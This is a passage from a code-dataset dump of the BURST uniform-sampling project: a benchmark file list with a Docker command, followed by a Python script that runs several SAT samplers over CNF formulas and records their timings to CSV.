/home/samplingfm/Benchmarks/V3/s953a_3_2.cnf /home/samplingfm/Benchmarks/V7/s953a_7_4.cnf /home/samplingfm/Benchmarks/V15/s953a_15_7.cnf /home/samplingfm/Benchmarks/V7/s820a_7_4.cnf /home/samplingfm/Benchmarks/V7/s832a_7_4.cnf /home/samplingfm/Benchmarks/V15/s820a_15_7.cnf /home/samplingfm/Benchmarks/V3/s1238a_3_2.cnf /home/samplingfm/Benchmarks/V3/s1196a_3_2.cnf /home/samplingfm/Benchmarks/V15/s832a_15_7.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring24.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring22.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring20.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring21.cnf /home/samplingfm/Benchmarks/V7/s1238a_7_4.cnf /home/samplingfm/Benchmarks/V7/s1196a_7_4.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring23.cnf /home/samplingfm/Benchmarks/GuidanceService2.sk_2_27.cnf /home/samplingfm/Benchmarks/V15/s1238a_15_7.cnf /home/samplingfm/Benchmarks/V15/s1196a_15_7.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_0_b12_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_2_b12_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b12_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring27.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring25.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring30.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring22.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring6.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring51.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring10.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring40.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring26.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring11.cnf /home/samplingfm/Benchmarks/GuidanceService2.sk_2_27.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring30.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring28.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring10.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring8.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring29.cnf /home/samplingfm/Benchmarks/IssueServiceImpl.sk_8_30.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring9.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring14.cnf /home/samplingfm/Benchmarks/ActivityService2.sk_10_27.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring12.cnf /home/samplingfm/Benchmarks/IterationService.sk_12_27.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring16.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring70.cnf /home/samplingfm/Benchmarks/PhaseService.sk_14_27.cnf /home/samplingfm/Benchmarks/V3/s27_new_3_2.cnf /home/samplingfm/Benchmarks/ActivityService2.sk_10_27.cnf /home/samplingfm/Benchmarks/IterationService.sk_12_27.cnf /home/samplingfm/Benchmarks/ActivityService2.sk_10_27.cnf /home/samplingfm/Benchmarks/111.sk_2_36.cnf /home/samplingfm/Benchmarks/ConcreteActivityService.sk_13_28.cnf /home/samplingfm/Benchmarks/V3/s5378a_3_2.cnf /home/samplingfm/Benchmarks/partition.sk_22_155.cnf /home/samplingfm/Benchmarks/ProjectService3.sk_12_55.cnf /home/samplingfm/Benchmarks/NotificationServiceImpl2.sk_10_36.cnf /home/samplingfm/Benchmarks/109.sk_4_36.cnf /home/samplingfm/Benchmarks/81.sk_5_51.cnf /home/samplingfm/Benchmarks/FMEasy/2.6.32-2var.cnf /home/samplingfm/Benchmarks/70.sk_3_40.cnf /home/samplingfm/Benchmarks/ProcessBean.sk_8_64.cnf /home/samplingfm/Benchmarks/FeatureModels/sam7ex256.cnf /home/samplingfm/Benchmarks/V3/s35932_3_2.cnf /home/samplingfm/Benchmarks/80.sk_2_48.cnf /home/samplingfm/Benchmarks/IterationService.sk_12_27.cnf /home/samplingfm/Benchmarks/doublyLinkedList.sk_8_37.cnf /home/samplingfm/Benchmarks/V3/s1196a_3_2.cnf /home/samplingfm/Benchmarks/LoginService.sk_20_34.cnf /home/samplingfm/Benchmarks/29.sk_3_45.cnf /home/samplingfm/Benchmarks/17.sk_3_45.cnf /home/samplingfm/Benchmarks/isolateRightmost.sk_7_481.cnf /home/samplingfm/Benchmarks/LoginService2.sk_23_36.cnf /home/samplingfm/Benchmarks/36.sk_3_77.cnf /home/samplingfm/Benchmarks/signedAvg.sk_8_1020.cnf /home/samplingfm/Benchmarks/enqueueSeqSK.sk_10_42.cnf /home/samplingfm/Benchmarks/tutorial3.sk_4_31.cnf\" \n\nVM_CMD=\"docker run -v /mnt/srv/tempdd/macher/usampling-exp/:/home/usampling-exp:z macher/usampling:squashed /bin/bash -c 'cd /home/usampling-exp/; echo STARTING; python3 usampling-experiments.py --smarch -t 180 -flas $BENCH FeatureModels FMEasy; echo END'\"\n\n(6 samplers)\nthere is also the log for SMARCH (can be useful)" }, { "alpha_fraction": 0.5835053324699402, "alphanum_fraction": 0.5931860208511353, "avg_line_length": 43.4183349609375, "blob_id": "a5613c24cbe2027010724252aee173f93695977f", "content_id": "f57cbc95e9d94c33af9c7a4f78f582409d304300", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 26651, "license_type": "permissive", "max_line_length": 317, "num_lines": 600, "path": "/usampling-experiments.py", "repo_name": "diverse-project/BURST", "src_encoding": "UTF-8", "text": "from os import listdir, chdir\nfrom os.path import isfile, join\nimport subprocess\nfrom subprocess import STDOUT, check_output, TimeoutExpired, CalledProcessError\nimport pandas as pd\nimport numpy as np\nimport time\nimport re\nimport sys\nfrom statistics import mean\nimport threading\nimport multiprocessing\nimport queue\nimport os\nimport signal\nimport shlex\nfrom subprocess import Popen, PIPE\nfrom threading import Timer\n\nimport argparse\nimport tempfile\n\nprint('loading packages...')\n\nFM_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/FeatureModels/\"\nFM2_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/FMEasy/\"\nFLA_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/\"\nFLABLASTED_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/Blasted_Real/\"\nFLAV7_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/V7/\"\nFLAV3_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/V3/\"\nFLAV15_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/V15/\"\n\nFMLINUX_DATASET_FOLDER=\"/home/fm_history_linux_dimacs/\"\n\n\n### execution_time_in is measurement within Python\n### we may have other/intermediate measures as well\n\ndef run_with_timeout(cmd, timeout_sec, cwd=None):\n proc = Popen(shlex.split(cmd), stdout=PIPE, stderr=PIPE, cwd=cwd)\n timer = Timer(timeout_sec, proc.kill)\n try:\n timer.start()\n s = proc.wait()\n if (s == 0):\n stdout, stderr = proc.communicate() # proc.stdout, proc.stderr #\n return stdout, stderr\n else:\n return None, None\n finally:\n timer.cancel()\n\ndef partial_output(proc,outq):\n \n for l in iter(proc.stdout.readline,b''):\n outq.put(l.decode('utf-8')) \n return\n\n\ndef run_with_timeout_partial(cmd, timeout_sec, cwd=None):\n \n proc= Popen(shlex.split(cmd), stdout=PIPE, stderr=PIPE, cwd=cwd,preexec_fn=os.setsid)\n output = '' \n outq = multiprocessing.Queue() \n d = multiprocessing.Process(target=partial_output,args=(proc,outq))\n d.start()\n try:\n print('Starting the smarch command') \n proc.wait(timeout=timeout_sec)\n d.terminate()\n d.join()\n while True: \n try:\n elem = outq.get(block=False)\n #print('line: '+ elem)\n output=output + elem\n except queue.Empty:\n #print('Queue empty...')\n break\n \n outq.close()\n return output, proc.stderr, False\n \n except TimeoutExpired:\n print('TIMEOUT REACHED')\n d.terminate()\n d.join()\n while True: \n try:\n elem = outq.get(block=False)\n #line = outq.get()\n #print('t_line: '+ elem)\n output=output + elem\n except queue.Empty:\n #print('t_Queue empty...')\n break \n \n outq.close()\n os.killpg(os.getpgid(proc.pid),signal.SIGTERM) \n return output, proc.stderr, True\n except KeyboardInterrupt:\n print('Program interrupted by the user...')\n d.terminate()\n d.join()\n outq.close()\n os.killpg(os.getpgid(proc.pid),signal.SIGTERM) \n os.kill(os.getpid(),signal.SIGTERM) \n \ndef mk_spur_cmd(nsamples):\n return \"./samplers/spur -s \" + str(nsamples) + \" -cnf\" # + \" -t \" + str(TIMEOUT)\n# return \"/home/spur/build/Release/spur -s \" + str(nsamples) + \" -cnf\" # + \" -t \" + str(TIMEOUT)\n\ndef experiment_SPUR(flas, timeout, nsamples, savecsv_onthefly=None):\n\n exp_results = pd.DataFrame()\n for fla in flas:\n full_cmd = mk_spur_cmd(nsamples) + \" \" + fla\n #print(\"calling \", full_cmd.split(\" \"))\n #subprocess.call(full_cmd, shell=True)\n\n try:\n start = time.time()\n output = check_output(full_cmd.split(\" \"), stderr=STDOUT, timeout=timeout, encoding='UTF-8') #, shell=True not recommended # https://stackoverflow.com/questions/36952245/subprocess-timeout-failure\n end = time.time()\n etime = end - start\n\n #### extracting information between start header and end header\n i = 0\n start_indice = -1\n end_indice = -1\n for o in output.splitlines():\n if \"#START_HEADER\" in o:\n start_indice = i\n if \"#END_HEADER\" in o:\n end_indice = i\n i = i + 1\n if (not (start_indice is -1 and end_indice is -1)):\n expe_infos = output.splitlines()[start_indice+1:end_indice]\n dict_exp = {}\n for exp in expe_infos:\n if 'num_second_pass_vars' in exp:\n continue\n e = exp.split(\",\")\n if not len(e) is 2:\n print(\"Error in parsing header and expe information\", exp)\n key = exp\n val = np.NaN\n else:\n key = e[0]\n val = e[1]\n #print(key, \"=>\", val)\n #df_exp[key] = val\n dict_exp.update({key : [val]})\n dict_exp.update({'timeout' : [False]})\n dict_exp.update({'execution_time_in' : [etime]})\n df_exp = pd.DataFrame(dict_exp, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n except TimeoutExpired:\n df_exp = pd.DataFrame({'formula_file' : [fla], 'execution_time_in': [timeout], 'timeout' : [True]}, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n #print(\"Timeout\")\n continue\n # print(\"DONE\")\n finally:\n if savecsv_onthefly is not None:\n exp_results.to_csv(savecsv_onthefly, index=False)\n return exp_results\n\n\ndef extract_pattern(dpattern, ostr):\n if (dpattern in ostr):\n d = ostr.split(dpattern, 1)[-1]\n if (d and len(d) > 0):\n return d.strip()\n return None\n\n# assuming that we are executing it in samplers folder!\ndef mk_kus_cmd(nsamples):\n return \"python3 KUS.py --samples \" + str(nsamples)\n # return \"python3 ./samplers/KUS.py --samples \" + str(nsamples)\n # return \"python3 /home/KUS/KUS.py --samples \" + str(nsamples)\n\ndef experiment_KUS(flas, timeout, nsamples, savecsv_onthefly=None):\n\n exp_results = pd.DataFrame()\n for fla in flas:\n\n full_cmd_kus = mk_kus_cmd(nsamples) + \" \" + fla\n # full_cmd_kus = '/home/samplingfm/scripts/doalarm -t real 10 ' + full_cmd_kus\n print(full_cmd_kus)\n #print(\"calling \", full_cmd.split(\" \"))\n #subprocess.call(full_cmd, shell=True)\n\n try:\n # output = check_output(full_cmd_kus.split(\" \"), stderr=STDOUT, timeout=TIMEOUT, encoding='UTF-8', cwd='/home/KUS/') #, shell=True not recommended # https://stackoverflow.com/questions/36952245/subprocess-timeout-failure\n # cwd = os.getcwd()\n # os.chdir(str(os.getcwd()) + '/samplers') # position the execution \n start = time.time()\n # output = check_output(full_cmd_kus.split(\" \"), timeout=TIMEOUT, cwd='/home/KUS/')\n # proc = subprocess.run(full_cmd_kus.split(\" \"), timeout=TIMEOUT, cwd='/home/KUS/') # capture_output=True leads to blocking https://stackoverflow.com/questions/1191374/using-module-subprocess-with-timeout https://www.blog.pythonlibrary.org/2016/05/17/python-101-how-to-timeout-a-subprocess/\n # op, err = run_with_timeout(full_cmd_kus, timeout, cwd='/home/KUS')\n op, err = run_with_timeout(full_cmd_kus, timeout, cwd=str(os.getcwd()) + '/samplers') # execute the command in this folder (otherwise DNNF does not work)\n # op, err = run_with_timeout(full_cmd_kus, timeout, cwd=str(os.getcwd())) # execute the command in this folder (otherwise DNNF does not work)\n end = time.time()\n etime = end - start\n # os.chdir(str(cwd)) # getting back\n if (op is None): # timeout!\n print(\"TIMEOUT\")\n df_exp = pd.DataFrame({'formula_file' : fla, 'timeout' : True, 'execution_time_in': timeout}, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n else:\n output = op.decode(\"utf-8\")\n\n\n #Time taken for dDNNF compilation: 5.967377424240112\n #Time taken to parse the nnf text: 0.05161333084106445\n #Time taken for Model Counting: 0.04374361038208008\n #Model Count: 536870912\n #Time taken by sampling: 0.1852860450744629\n dnnf_time = None\n dnnfparsing_time = None\n counting_time = None\n model_count = None\n sampling_time = None\n for o in output.splitlines():\n if dnnf_time is None:\n dnnf_time = extract_pattern('Time taken for dDNNF compilation:', o)\n if dnnfparsing_time is None:\n dnnfparsing_time = extract_pattern('Time taken to parse the nnf text:', o)\n if counting_time is None:\n counting_time = extract_pattern('Time taken for Model Counting:', o)\n if model_count is None:\n model_count = extract_pattern('Model Count:', o)\n if (sampling_time is None):\n sampling_time = extract_pattern('Time taken by sampling:', o)\n\n\n #### TODO: KUS may fail after DNNF\n\n df_exp = pd.DataFrame({'formula_file' : fla, 'timeout' : False, 'execution_time_in': etime, 'dnnf_time' : dnnf_time, 'sampling_time': sampling_time, 'model_count': model_count, 'counting_time' : counting_time, 'dnnfparsing_time' : dnnfparsing_time}, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n\n #df_exp = pd.DataFrame({'formula_file' : [fla], 'execution_time_in': etime, 'timeout' : [False]}, index=[0])\n #exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n print(\"DONE\")\n except CalledProcessError:\n print(\"CalledProcessError error\")\n continue\n except Exception as er:\n print(\"OOOPS (unknown exception)\", er)\n continue \n finally:\n if savecsv_onthefly is not None:\n exp_results.to_csv(savecsv_onthefly, index=False)\n\n return exp_results\n\n\ndef mk_unigen2_cmd(nsamples):\n return \"python3 UniGen2.py -samples=\" + str(nsamples) # assume that it is executed in samplers folder\n\ndef experiment_Unigen2(flas, timeout, nsamples, savecsv_onthefly=None):\n\n exp_results = pd.DataFrame()\n for fla in flas:\n\n full_cmd_unigen2 = mk_unigen2_cmd(nsamples) + \" \" + fla + ' ' + tempfile.gettempdir()\n print(full_cmd_unigen2)\n\n try:\n start = time.time()\n op, err = run_with_timeout(full_cmd_unigen2, timeout, cwd=str(os.getcwd()) + '/samplers') \n end = time.time()\n etime = end - start\n if (op is None): # timeout!\n print(\"TIMEOUT\")\n df_exp = pd.DataFrame({'formula_file' : fla, 'timeout' : True, 'execution_time_in': timeout}, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n else:\n output = op.decode(\"utf-8\")\n df_exp = pd.DataFrame({'formula_file' : fla, 'timeout' : False, 'execution_time_in': etime}, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n print(\"DONE\")\n except CalledProcessError:\n print(\"CalledProcessError error\")\n continue\n except Exception as er:\n print(\"OOOPS (unknown exception)\", er)\n continue \n finally:\n if savecsv_onthefly is not None:\n exp_results.to_csv(savecsv_onthefly, index=False)\n\n return exp_results\n\n\ndef mk_unigen3_cmd(nsamples): \n return \"./samplers/approxmc3 -s 42 -v 0 --samples \" + str(nsamples) # TODO: parameterize seed?\n\n\ndef experiment_Unigen3(flas, timeout, nsamples, savecsv_onthefly=None):\n\n exp_results = pd.DataFrame()\n for fla in flas:\n full_cmd_unigen3 = mk_unigen3_cmd(nsamples) + \" \" + fla\n print(full_cmd_unigen3)\n try:\n start = time.time()\n # op, err = run_with_timeout(full_cmd_unigen3, timeout, cwd=str(os.getcwd()) + '/samplers')\n output = check_output(full_cmd_unigen3.split(\" \"), stderr=STDOUT, timeout=timeout, encoding='UTF-8')\n print(\"still alive (TODO!)\", output)\n \n except TimeoutExpired:\n df_exp = pd.DataFrame({'formula_file' : [fla], 'execution_time_in': [timeout], 'timeout' : [True]}, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n print(\"Timeout\") \n continue\n except subprocess.CalledProcessError as e:\n # seems unavoidable and actually the normal case\n # print(e.returncode)\n # print(e.cmd)\n # print(e.output) \n\n end = time.time()\n etime = end - start\n # os.chdir(str(cwd)) # getting back\n\n # if (op is None): # timeout!\n # print(\"TIMEOUT\")\n # df_exp = pd.DataFrame({'formula_file' : fla, 'timeout' : True, 'execution_time_in': timeout}, index=[0])\n # exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n # else:\n # output = op.decode(\"utf-8\") \n # nsolutions = None\n # for o in output.splitlines():\n # if nsolutions is None:\n # nsolutions = extract_pattern(\"Number of solutions is\", output) \n \n\n df_exp = pd.DataFrame({'formula_file' : fla, 'timeout' : False, 'execution_time_in': etime }, index=[0]) # , 'nsolutions': nsolutions})\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n\n print(\"DONE\")\n\n continue\n finally:\n if savecsv_onthefly is not None:\n exp_results.to_csv(savecsv_onthefly, index=False)\n\n return exp_results\n\n\n\n\n\n\n\n\n\n\n\ndef mk_cmd_smarch(nsamples,pthreads,mp=False):\n if mp:\n return \"python3 ./samplers/smarch_mp.py -p \" + str(pthreads)\n # return \"python3 smarch_mp.py -p \" + str(pthreads)\n else: \n return \"python3 ./samplers/smarch.py\"\n # return \"python3 smarch.py\"\n\ndef experiment_SMARCH(flas, timeout, nsamples, pthreads, savecsv_onthefly=None,mp=False):\n SMARCH_OUTPUT_DIR='./smarch_samples'\n exp_results = pd.DataFrame() \n for fla in flas:\n full_cmd_smarch = mk_cmd_smarch(nsamples,pthreads,mp) + \" -o \" + SMARCH_OUTPUT_DIR + \" \" + fla + \" \" + str(nsamples) \n print(full_cmd_smarch)\n\n try:\n start = time.time()\n output, err, time_out = run_with_timeout_partial(full_cmd_smarch, timeout, cwd='.')\n end = time.time()\n etime = end - start\n #output = op.decode(\"utf-8\")\n print('printing command output:') # for debug only\n print(output) #for debug only\n sampling_times = []\n avg_time = None\n model_count = None\n total_sampling_time = None\n lines = output.splitlines()\n if (len(lines) > 3):\n model_count = extract_pattern('Counting - Total configurations:', lines[3])\n for i in range(4,len(lines)-1):\n t = extract_pattern('sampling time:', lines[i])\n if t is not None:\n try:\n st = float(t)\n sampling_times.append(st)\n except ValueError:\n pass\n if (len(sampling_times)>0):\n avg_time = mean(sampling_times)\n total_sampling_time = sum(sampling_times) \n \n\n df_exp = pd.DataFrame({'formula_file' : fla,'timeout': timeout, 'timeout_reached' : time_out, 'execution_time_in': etime, 'total_sampling_time': total_sampling_time, 'avg_sampling_time': avg_time, 'model_count': model_count,'requested_samples': nsamples, 'actual_samples': len(sampling_times)}, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n \n print(\"DONE\")\n except CalledProcessError:\n print(\"CalledProcessError error\")\n continue\n except Exception as er:\n print(\"OOOPS (unknown exception)\", er)\n continue\n finally:\n if savecsv_onthefly is not None:\n exp_results.to_csv(savecsv_onthefly, index=False)\n\n return exp_results\n\n\n\ndef experiment_DBS(flas, timeout, nsamples, savecsv_onthefly=None):\n output_dir = './dbs_samples'\n exp_results = pd.DataFrame()\n for fla in flas:\n print(fla)\n # prepare the script.a file\n inputFileSuffix = fla.split('/')[-1][:-4]\n tempOutputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".txt\"\n\n # creating the file to configure the sampler\n dbsConfigFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".a\"\n\n with open(dbsConfigFile, 'w+') as f:\n f.write(\"log \" + tempfile.gettempdir() + '/' + \"output.txt\" + \"\\n\")\n f.write(\"dimacs \" + str(os.path.abspath(fla)) + \"\\n\")\n params = \" solver z3\"+ \"\\n\"\n params += \"hybrid distribution-aware distance-metric:manhattan distribution:uniform onlyBinary:true onlyNumeric:false\"\n params += \" selection:SolverSelection number-weight-optimization:1\"\n params += \" numConfigs:\" + str(nsamples)\n f.write(params + \"\\n\")\n f.write(\"printconfigs \" + tempOutputFile)\n\n cmd = \"mono ./samplers/distribution-aware/CommandLine.exe \"\n # cmd = \"mono ./distribution-aware/CommandLine.exe \"\n cmd += dbsConfigFile\n\n try:\n start = time.time() \n output = check_output(cmd.split(\" \"), stderr=STDOUT, timeout=timeout, encoding='UTF-8')\n print(\"still alive, DONE!\", output)\n # not like Unigen3: it is the expected \"process\"\n end = time.time()\n etime = end - start\n df_exp = pd.DataFrame({'formula_file' : fla, 'timeout' : False, 'execution_time_in': etime, 'exception_dbs': False }, index=[0]) # , 'nsolutions': nsolutions})\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n \n except TimeoutExpired:\n df_exp = pd.DataFrame({'formula_file' : [fla], 'execution_time_in': [timeout], 'timeout' : [True], 'exception_dbs': [False]}, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n print(\"TIMEOUT\") \n continue\n except subprocess.CalledProcessError as e:\n print(e.returncode)\n print(e.cmd)\n\n out_dbs = e.output\n if out_dbs is not None:\n if \"Unhandled Exception:\" in out_dbs.splitlines():\n print(\"FAILURE! not really a timeout \", out_dbs) # TODO\n end = time.time()\n etime = end - start \n # for dbs, maybe timeout is tristate: true, false, and exception...\n # considering that it is timeout (because it fails to return a solution) but the execution_time_in is not equals to timeout\n # and we set 'exception_dbs': True (false otherwise)\n df_exp = pd.DataFrame({'formula_file' : fla, 'timeout' : True, 'execution_time_in': etime, 'exception_dbs': True }, index=[0]) # , 'nsolutions': nsolutions})\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n else:\n print(\"unknow case\")\n print(e.output)\n continue\n finally:\n if savecsv_onthefly is not None:\n exp_results.to_csv(savecsv_onthefly, index=False)\n return exp_results\n\n\n\n\n################# Formulas to process\n\n# csv_pattern eg KUS\ndef get_formulas_timeout(resume_folder, csv_pattern):\n flas_dataset = []\n csv_files_results = [join(resume_folder, f) for f in listdir(resume_folder) if isfile(join(resume_folder, f)) and f.endswith(\".csv\") and csv_pattern in f]\n for csv_file_result in csv_files_results:\n df_computations = pd.read_csv(csv_file_result)\n flas_dataset.extend(list(df_computations.query('timeout == True')['formula_file'].values))\n return flas_dataset\n \n\ndef all_cnf_files(folder):\n return [join(folder, f) for f in listdir(folder) if isfile(join(folder, f)) and f.endswith(\".cnf\")]\n\ndef all_dimacs_files(folder):\n return [join(folder, f) for f in listdir(folder) if isfile(join(folder, f)) and f.endswith(\".dimacs\")]\n\n#dataset_fla = { 'fla' : FLA_DATASET_FOLDER, 'fm' : FM_DATASET_FOLDER, 'fmeasy' : FM2_DATASET_FOLDER, 'v15' : FLAV15_DATASET_FOLDER, 'v3' : FLAV3_DATASET_FOLDER, 'v7' : FLAV7_DATASET_FOLDER }\n\ndataset_fla = { 'fla' : FLA_DATASET_FOLDER, 'fm' : FM_DATASET_FOLDER, 'fmeasy' : FM2_DATASET_FOLDER, 'v15' : FLAV15_DATASET_FOLDER, 'blaster' : FLABLASTED_DATASET_FOLDER }\n\n# OUTPUT_DIR='./'\n# useful to store results in a dedicated folder\n# we can mount a volume with Docker so that results are visible outside \nOUTPUT_DIR='usampling-data/' # assume that this folder exists... \n\n \nprint('parsing arguments')\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-t\", \"--timeout\", help=\"timeout for the sampler\", type=int, default=10)\nparser.add_argument(\"-n\", \"--nsamples\", help=\"number of samples\", type=int, default=10)\nparser.add_argument(\"-p\", \"--pthreads\", help=\"number of threads (SMARCH multitprocessing\", type=int, default=3)\nparser.add_argument('-flas','--formulas', nargs=\"+\", help='formulas or feature models to process (cnf or dimacs files typically). You can also specify \"FeatureModels\", \"FMEasy\", \"Blasted_Real\", \"V7\", \"V3\", \"V15\", \"Benchmarks\", or \"fm_history_linux_dimacs\" to target specific folders', default=None)\nparser.add_argument(\"--kus\", help=\"enable KUS experiment over ICST benchmarks\", action=\"store_true\")\nparser.add_argument(\"--spur\", help=\"enable SPUR experiment over ICST benchmarks\", action=\"store_true\")\nparser.add_argument(\"--unigen2\", help=\"enable Unigen2 experiment over ICST benchmarks\", action=\"store_true\")\nparser.add_argument(\"--unigen3\", help=\"enable Unigen3 experiment over ICST benchmarks\", action=\"store_true\")\nparser.add_argument(\"--smarch\", help=\"enable SMARCH experiment over FM benchmarks selected from ICST\", action=\"store_true\")\nparser.add_argument(\"--dbs\", help=\"enable distance-based sampling experiment over FM benchmarks selected from ICST\", action=\"store_true\")\nparser.add_argument(\"--smarchmp\", help=\"enable SMARCH MP experiment over FM benchmarks selected from ICST\", action=\"store_true\")\nargs = parser.parse_args()\n\ntimeout=args.timeout\nnsamples=args.nsamples\npthreads=args.pthreads\n\nflas_args = args.formulas\n\nflas_to_process = []\nprint(\"starting usampling bench\")\nif flas_args is not None:\n print(\"formulas to process explicitly given\", flas_args)\n for fla_arg in flas_args:\n if fla_arg in \"fm_history_linux_dimacs\":\n print(\"folder of Linux formulas (SPLC challenge track)\", fla_arg)\n print(\"WARNING: requires the big dataset, use the appropriate Docker image eg macher/usampling:fmlinux\") \n flas_to_process.extend(all_dimacs_files(FMLINUX_DATASET_FOLDER))\n elif fla_arg in \"Benchmarks\":\n print(\"folder of formulas\", fla_arg)\n flas_to_process.extend(all_cnf_files(\"/home/samplingfm/\" + fla_arg)) # TODO: variable for \"/home/samplingfm/\"?\n elif fla_arg in (\"FeatureModels\", \"FMEasy\", \"Blasted_Real\", \"V7\", \"V3\", \"V15\"):\n print(\"folder of formulas\", fla_arg)\n flas_to_process.extend(all_cnf_files(\"/home/samplingfm/Benchmarks/\" + fla_arg)) # fixme: why not FLA_DATASET_FOLDER instead of /home/samplingfm/Benchmarks/\n else:\n print('individual formula', fla_arg)\n flas_to_process.append(fla_arg)\nelse: # by default \n print(\"default dataset/folders\", dataset_fla)\n for dataset_key, dataset_folder in dataset_fla.items():\n flas_to_process.extend(all_cnf_files(dataset_folder))\n\nprint(len(flas_to_process), \"formulas to process\", flas_to_process)\n\nif args.kus:\n print(\"KUS experiment\")\n experiment_KUS(flas=flas_to_process, timeout=timeout, nsamples=nsamples, savecsv_onthefly=OUTPUT_DIR + \"experiments-KUS.csv\")\n\nif args.spur:\n print(\"SPUR experiment\")\n experiment_SPUR(flas=flas_to_process, timeout=timeout, nsamples=nsamples, savecsv_onthefly=OUTPUT_DIR + \"experiments-SPUR.csv\")\n\nif args.unigen3:\n print(\"Unigen3 experiment\")\n experiment_Unigen3(flas=flas_to_process, timeout=timeout, nsamples=nsamples, savecsv_onthefly=OUTPUT_DIR + \"experiments-Unigen3.csv\")\n\nif args.unigen2:\n print(\"Unigen2 experiment\")\n experiment_Unigen2(flas=flas_to_process, timeout=timeout, nsamples=nsamples, savecsv_onthefly=OUTPUT_DIR + \"experiments-Unigen2.csv\")\n\nif args.dbs:\n print(\"DBS experiment\")\n experiment_DBS(flas=flas_to_process, timeout=timeout, nsamples=nsamples, savecsv_onthefly=OUTPUT_DIR + \"experiments-DBS.csv\")\n \nif args.smarch:\n print(\"SMARCH experiment\")\n experiment_SMARCH(flas=flas_to_process, timeout=timeout, nsamples=nsamples, pthreads=pthreads, savecsv_onthefly=OUTPUT_DIR + \"experiments-SMARCH.csv\", mp=False)\nif args.smarchmp:\n print(\"SMARCH MP experiment\")\n experiment_SMARCH(flas=flas_to_process, timeout=timeout, nsamples=nsamples, pthreads=pthreads, savecsv_onthefly=OUTPUT_DIR + \"experiments-SMARCH-mp.csv\", mp=True)\n\nprint('end of benchmarks')\n\n#### for debugging run timeout\n#o, e = run_with_timeout('python3 /home/KUS/KUS.py --samples 10 /home/samplingfm/Benchmarks/111.sk_2_36.cnf', TIMEOUT * 2, cwd='/home/KUS/')\n#print(o.decode(\"utf-8\"), \"\\n\\n\", e.decode(\"utf-8\"))\n# print(o, \"\\n\\n\", e)\n#o1, e1 = run_with_timeout('python3 /home/KUS/KUS.py --samples 10 /home/samplingfm/Benchmarks/karatsuba.sk_7_41.cnf', TIMEOUT, cwd='/home/KUS/')\n#print(o1, e1)\n#assert (o1 is None)\n" }, { "alpha_fraction": 0.5461187958717346, "alphanum_fraction": 0.5567381978034973, "avg_line_length": 35.237422943115234, "blob_id": "bcf2644f9ce39427b2936ff23452498b05636237", "content_id": "2dc134e32c461ee7b0dd320107c912e8ba4b9284", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 41057, "license_type": "permissive", "max_line_length": 177, "num_lines": 1133, "path": "/barbarik.py", "repo_name": "diverse-project/BURST", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright (C) 2018 Kuldeep Meel\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; version 2\n# of the License.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin 